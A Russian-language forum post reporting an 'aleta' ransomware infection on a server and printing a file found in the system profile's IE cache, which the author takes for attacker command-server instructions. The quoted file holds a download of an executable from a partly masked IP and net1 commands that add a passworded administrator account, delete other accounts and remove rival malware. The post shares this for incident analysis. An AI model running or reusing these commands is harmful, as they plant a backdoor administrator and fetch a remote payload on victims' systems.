virus_alert Опубликовано 25 июля, 2017 Share Опубликовано 25 июля, 2017 На одном из серверов, где не было антивируса, сработал шифровальщик aleta. Все данные в итоге удалось восстановить. Из интересного был найден файл ok[1].txt в системном профиле C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 Ниже его содержимое, могу предположить, что это ip-адрес командного сервера злоумышленников. [down] h__p://118.xxx.xxx.141:8888/ppsa.jpg c:\windows\Loginsas.exe 1 [cmd] net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe del c:\windows\RichDllt.dll taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del echo 123>>1.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения